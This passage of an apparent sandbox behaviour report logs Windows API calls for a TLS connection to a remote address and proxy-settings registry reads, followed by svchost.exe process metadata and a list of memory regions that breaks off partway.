	[0619.283] shutdown (s=0x7cc, how=2) returned 0
	[0619.293] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0619.293] closesocket (s=0x7cc) returned 0
	[0619.295] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0619.295] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9bc
	[0619.296] WSAConnect (in: s=0x7cc, name=0x233e4943ea8*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0619.404] closesocket (s=0x9bc) returned 0
	[0619.406] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e4940e50, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e4944730, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e4944730, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0619.408] FreeContextBuffer (in: pvContextBuffer=0x233fc687000 | out: pvContextBuffer=0x233fc687000) returned 0x0
	[0619.408] send (in: s=0x7cc, buf=0x233e4944800*, len=333, flags=0 | out: buf=0x233e4944800*) returned 333
	[0619.408] recv (in: s=0x7cc, buf=0x233e4944800, len=5, flags=0 | out: buf=0x233e4944800*) returned 5
	[0619.514] recv (in: s=0x7cc, buf=0x233e4944805, len=49, flags=0 | out: buf=0x233e4944805*) returned 49
	[0619.514] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e4940e50, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4944a40, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e4944a60, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e4944a60, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0619.514] recv (in: s=0x7cc, buf=0x233e4944b50, len=5, flags=0 | out: buf=0x233e4944b50*) returned 5
	[0619.514] recv (in: s=0x7cc, buf=0x233e4944b75, len=1, flags=0 | out: buf=0x233e4944b75*) returned 1
	[0619.515] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e4940e50, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4944c48, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e4944c68, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e4944c68, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0619.515] recv (in: s=0x7cc, buf=0x233e4944d58, len=5, flags=0 | out: buf=0x233e4944d58*) returned 5
	[0619.515] recv (in: s=0x7cc, buf=0x233e4944d7d, len=48, flags=0 | out: buf=0x233e4944d7d*) returned 48
	[0619.515] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e4940e50, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4944e80, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e4944ea0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e4944ea0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0619.517] FreeContextBuffer (in: pvContextBuffer=0x233e399bf80 | out: pvContextBuffer=0x233e399bf80) returned 0x0
	[0619.517] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e4944fe8 | out: pBuffer=0x233e4944fe8) returned 0x0
	[0619.517] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e4945040 | out: pBuffer=0x233e4945040) returned 0x0
	[0619.518] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e49450a8 | out: pBuffer=0x233e49450a8) returned 0x0
	[0619.519] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0619.519] CertDuplicateStore (hCertStore=0x233fc682a60) returned 0x233fc682a60
	[0619.519] CertEnumCertificatesInStore (hCertStore=0x233fc682a60, pPrevCertContext=0x0) returned 0x233fc67feb0
	[0619.520] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0619.520] CertEnumCertificatesInStore (hCertStore=0x233fc682a60, pPrevCertContext=0x233fc67feb0) returned 0x0
	[0619.520] CertCloseStore (hCertStore=0x233fc682a60, dwFlags=0x0) returned 1
	[0619.521] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0619.523] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc682170
	[0619.523] CertAddCRLLinkToStore (in: hCertStore=0x233fc682170, pCrlContext=0x233fc67feb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0619.523] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67feb0, pTime=0x350199b4c8, hAdditionalStore=0x233fc682170, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0619.525] CertDuplicateCertificateChain (pChainContext=0x233fc6ff290) returned 0x233fc6ff290
	[0619.527] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0619.527] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0619.528] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0619.528] CertFreeCertificateChain (pChainContext=0x233fc6ff290) 
	[0619.528] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6ff290, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0619.528] SetLastError (dwErrCode=0x0) 
	[0619.529] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6ff290, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0619.529] CertFreeCertificateChain (pChainContext=0x233fc6ff290) 
	[0619.529] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0619.529] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e4947cb0, MessageSeqNo=0x0 | out: pMessage=0x233e4947cb0) returned 0x0
	[0619.530] CoTaskMemAlloc (cb=0x20) returned 0x233fc650110
	[0619.530] WSASend (in: s=0x7cc, lpBuffers=0x233fc650110*=((len=0x3b, buf=0x233e4944f70*), (len=0xd5, buf=0x233e4947ab8*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc650110*=((len=0x3b, buf=0x233e4944f70*), (len=0xd5, buf=0x233e4947ab8*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0619.530] CoTaskMemFree (pv=0x233fc650110) 
	[0619.530] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0619.530] recv (in: s=0x7cc, buf=0x233e4947e58, len=5, flags=0 | out: buf=0x233e4947e58*) returned 5
	[0620.046] recv (in: s=0x7cc, buf=0x233e4947e7d, len=1488, flags=0 | out: buf=0x233e4947e7d*) returned 1488
	[0620.046] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e4948560, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e4948560, pfQOP=0x0) returned 0x0
	[0620.047] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0620.047] SetEvent (hEvent=0x6b4) returned 1
	[0620.078] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c
	[0634.081] CloseHandle (hObject=0x25c) returned 1
	[0634.384] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x25c) returned 0x0
	[0634.385] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x9c8) returned 0x0
	[0634.386] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x164
	[0634.386] RegNotifyChangeKeyValue (hKey=0x9c8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x164, fAsynchronous=1) returned 0x0
	[0634.388] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa64) returned 0x0
	[0634.388] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4
	[0634.388] RegNotifyChangeKeyValue (hKey=0xa64, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3c4, fAsynchronous=1) returned 0x0
	[0634.390] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa80) returned 0x0
	[0634.391] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa5c
	[0634.391] RegNotifyChangeKeyValue (hKey=0xa80, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa5c, fAsynchronous=1) returned 0x0
	[0634.392] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa70) returned 1
	[0634.393] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc689300
	[0634.393] WinHttpSetTimeouts (hInternet=0x233fc689300, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0634.393] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0634.413] SetEvent (hEvent=0x6b4) returned 1
	[0634.414] select (in: nfds=0, readfds=0x233e483ab28, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e483ab28, writefds=0x0, exceptfds=0x0) returned 1
	[0634.415] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0634.417] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0634.419] shutdown (s=0x7cc, how=2) returned 0
	[0634.424] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0634.424] closesocket (s=0x7cc) returned 0
	[0634.426] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0634.427] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa50
	[0634.427] WSAConnect (in: s=0x7cc, name=0x233e483c2c0*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0634.534] closesocket (s=0xa50) returned 0
	[0634.536] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e4839268, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e483cb48, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e483cb48, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0634.537] FreeContextBuffer (in: pvContextBuffer=0x233fc686760 | out: pvContextBuffer=0x233fc686760) returned 0x0
	[0634.537] send (in: s=0x7cc, buf=0x233e483cc18*, len=333, flags=0 | out: buf=0x233e483cc18*) returned 333
	[0634.538] recv (in: s=0x7cc, buf=0x233e483cc18, len=5, flags=0 | out: buf=0x233e483cc18*) returned 5
	[0634.643] recv (in: s=0x7cc, buf=0x233e483cc1d, len=49, flags=0 | out: buf=0x233e483cc1d*) returned 49
	[0634.643] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e4839268, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e483ce58, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e483ce78, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e483ce78, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0634.644] recv (in: s=0x7cc, buf=0x233e483cf68, len=5, flags=0 | out: buf=0x233e483cf68*) returned 5
	[0634.644] recv (in: s=0x7cc, buf=0x233e483cf8d, len=1, flags=0 | out: buf=0x233e483cf8d*) returned 1
	[0634.644] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e4839268, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e483d060, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e483d080, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e483d080, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0634.644] recv (in: s=0x7cc, buf=0x233e483d170, len=5, flags=0 | out: buf=0x233e483d170*) returned 5
	[0634.644] recv (in: s=0x7cc, buf=0x233e483d195, len=48, flags=0 | out: buf=0x233e483d195*) returned 48
	[0634.645] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e4839268, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e483d298, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e483d2b8, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e483d2b8, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0634.646] FreeContextBuffer (in: pvContextBuffer=0x233e399c700 | out: pvContextBuffer=0x233e399c700) returned 0x0
	[0634.646] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e483d400 | out: pBuffer=0x233e483d400) returned 0x0
	[0634.647] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e483d458 | out: pBuffer=0x233e483d458) returned 0x0
	[0634.647] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e483d4c0 | out: pBuffer=0x233e483d4c0) returned 0x0
	[0634.648] CertDuplicateCertificateContext (pCertContext=0x233fc680bb0) returned 0x233fc680bb0
	[0634.648] CertDuplicateStore (hCertStore=0x233fc681fd0) returned 0x233fc681fd0
	[0634.649] CertEnumCertificatesInStore (hCertStore=0x233fc681fd0, pPrevCertContext=0x0) returned 0x233fc680bb0
	[0634.649] CertDuplicateCertificateContext (pCertContext=0x233fc680bb0) returned 0x233fc680bb0
	[0634.649] CertEnumCertificatesInStore (hCertStore=0x233fc681fd0, pPrevCertContext=0x233fc680bb0) returned 0x0
	[0634.649] CertCloseStore (hCertStore=0x233fc681fd0, dwFlags=0x0) returned 1
	[0634.650] CertFreeCertificateContext (pCertContext=0x233fc680bb0) returned 1
	[0634.652] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc6831b0
	[0634.652] CertAddCRLLinkToStore (in: hCertStore=0x233fc6831b0, pCrlContext=0x233fc680bb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0634.652] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc680bb0, pTime=0x350199b4c8, hAdditionalStore=0x233fc6831b0, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0634.654] CertDuplicateCertificateChain (pChainContext=0x233fc6fee10) returned 0x233fc6fee10
	[0634.656] CertDuplicateCertificateContext (pCertContext=0x233fc680bb0) returned 0x233fc680bb0
	[0634.656] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0634.657] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0634.658] CertFreeCertificateChain (pChainContext=0x233fc6fee10) 
	[0634.658] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6fee10, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0634.658] SetLastError (dwErrCode=0x0) 
	[0634.658] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6fee10, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0634.659] CertFreeCertificateChain (pChainContext=0x233fc6fee10) 
	[0634.660] CertFreeCertificateContext (pCertContext=0x233fc680bb0) returned 1
	[0634.661] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e48400c8, MessageSeqNo=0x0 | out: pMessage=0x233e48400c8) returned 0x0
	[0634.661] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f9f0
	[0634.661] WSASend (in: s=0x7cc, lpBuffers=0x233fc64f9f0*=((len=0x3b, buf=0x233e483d388*), (len=0xd5, buf=0x233e483fed0*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64f9f0*=((len=0x3b, buf=0x233e483d388*), (len=0xd5, buf=0x233e483fed0*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0634.662] CoTaskMemFree (pv=0x233fc64f9f0) 
	[0634.662] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0634.662] recv (in: s=0x7cc, buf=0x233e4840270, len=5, flags=0 | out: buf=0x233e4840270*) returned 5
	[0635.179] recv (in: s=0x7cc, buf=0x233e4840295, len=1488, flags=0 | out: buf=0x233e4840295*) returned 1488
	[0635.179] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e4840978, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e4840978, pfQOP=0x0) returned 0x0
	[0635.179] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0635.179] SetEvent (hEvent=0x6b4) returned 1
	[0635.206] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c

Thread:
	id = 155
	os_tid = 0xabc


Thread:
	id = 156
	os_tid = 0xddc

	[0064.055] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0064.058] ResetEvent (hEvent=0x6b4) returned 1

Thread:
	id = 157
	os_tid = 0xdd8


Thread:
	id = 171
	os_tid = 0xec4


Thread:
	id = 251
	os_tid = 0xcc4


Process:
	id = "5"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x7445b000"
	os_pid = "0x3b8"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "rpc_server"
	parent_id = "4"
	os_parent_pid = "0xd94"
	cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cb16" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]

Region:
	              id = 707
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 708
	        start_va = 0x2a8a2d0000
	          end_va = 0x2a8a34ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8a2d0000"
	        filename = ""

Region:
	              id = 709
	        start_va = 0x2a8a400000
	          end_va = 0x2a8a5fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8a400000"
	        filename = ""

Region:
	              id = 710
	        start_va = 0x2a8a700000
	          end_va = 0x2a8a7fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8a700000"
	        filename = ""

Region:
	              id = 711
	        start_va = 0x2a8a800000
	          end_va = 0x2a8a8fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8a800000"
	        filename = ""

Region:
	              id = 712
	        start_va = 0x2a8a900000
	          end_va = 0x2a8a9fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8a900000"
	        filename = ""

Region:
	              id = 713
	        start_va = 0x2a8ab00000
	          end_va = 0x2a8abfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8ab00000"
	        filename = ""

Region:
	              id = 714
	        start_va = 0x2a8ac00000
	          end_va = 0x2a8acfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8ac00000"
	        filename = ""

Region:
	              id = 715
	        start_va = 0x2a8ad00000
	          end_va = 0x2a8adfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8ad00000"
	        filename = ""

Region:
	              id = 716
	        start_va = 0x2a8af00000
	          end_va = 0x2a8af7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8af00000"
	        filename = ""

Region:
	              id = 717
	        start_va = 0x2a8af80000
	          end_va = 0x2a8b07ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8af80000"
	        filename = ""

Region:
	              id = 718
	        start_va = 0x2a8b080000
	          end_va = 0x2a8b17ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8b080000"
	        filename = ""

Region:
	              id = 719
	        start_va = 0x2a8b180000
	          end_va = 0x2a8b1fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8b180000"
	        filename = ""

Region:
	              id = 720
	        start_va = 0x2a8b200000
	          end_va = 0x2a8b2fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8b200000"
	        filename = ""

Region:
	              id = 721
	        start_va = 0x2a8b300000
	          end_va = 0x2a8b37ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8b300000"
	        filename = ""

Region:
	              id = 722
	        start_va = 0x2a8b380000
	          end_va = 0x2a8b3fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8b380000"
	        filename = ""

Region:
	              id = 723
	        start_va = 0x2a8b500000
	          end_va = 0x2a8b5fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8b500000"
	        filename = ""

Region:
	              id = 724
	        start_va = 0x2a8b600000
	          end_va = 0x2a8b6fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8b600000"
	        filename = ""

Region:
	              id = 725
	        start_va = 0x2a8b700000
	          end_va = 0x2a8b7fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8b700000"
	        filename = ""

Region:
	              id = 726
	        start_va = 0x2a8b800000
	          end_va = 0x2a8b87ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8b800000"
	        filename = ""

Region:
	              id = 727
	        start_va = 0x2a8b880000
	          end_va = 0x2a8b97ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8b880000"
	        filename = ""

Region:
	              id = 728
	        start_va = 0x2a8b980000
	          end_va = 0x2a8ba7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8b980000"
	        filename = ""

Region:
	              id = 729
	        start_va = 0x2a8ba80000
	          end_va = 0x2a8bafffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8ba80000"
	        filename = ""

Region:
	              id = 730
	        start_va = 0x2a8bc00000
	          end_va = 0x2a8bc7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8bc00000"
	        filename = ""

Region:
	              id = 731
	        start_va = 0x2a8bc80000
	          end_va = 0x2a8bd7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8bc80000"
	        filename = ""

Region:
	              id = 732
	        start_va = 0x2a8bd80000
	          end_va = 0x2a8be7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8bd80000"
	        filename = ""

Region:
	              id = 733
	        start_va = 0x2a8be80000
	          end_va = 0x2a8befffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8be80000"
	        filename = ""

Region:
	              id = 734
	        start_va = 0x2a8bf00000
	          end_va = 0x2a8bffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8bf00000"
	        filename = ""

Region:
	              id = 735
	        start_va = 0x2a8c000000
	          end_va = 0x2a8c07ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8c000000"
	        filename = ""

Region:
	              id = 736
	        start_va = 0x2a8c080000
	          end_va = 0x2a8c0fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8c080000"
	        filename = ""

Region:
	              id = 737
	        start_va = 0x2a8c100000
	          end_va = 0x2a8c17ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8c100000"
	        filename = ""

Region:
	              id = 738
	        start_va = 0x2a8c180000
	          end_va = 0x2a8c27ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8c180000"
	        filename = ""

Region:
	              id = 739
	        start_va = 0x2a8c280000
	          end_va = 0x2a8c37ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8c280000"
	        filename = ""

Region:
	              id = 740
	        start_va = 0x2a8c380000
	          end_va = 0x2a8c47ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8c380000"
	        filename = ""

Region:
	              id = 741
	        start_va = 0x2a8c480000
	          end_va = 0x2a8c4fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8c480000"
	        filename = ""

Region:
	              id = 742
	        start_va = 0x2a8c500000
	          end_va = 0x2a8c5fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8c500000"
	        filename = ""

Region:
	              id = 743
	        start_va = 0x2a8c600000
	          end_va = 0x2a8c6fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8c600000"
	        filename = ""

Region:
	              id = 744
	        start_va = 0x2a8c900000
	          end_va = 0x2a8c9fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8c900000"
	        filename = ""

Region:
	              id = 745
	        start_va = 0x2a8ca00000
	          end_va = 0x2a8ca7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8ca00000"
	        filename = ""

Region:
	              id = 746
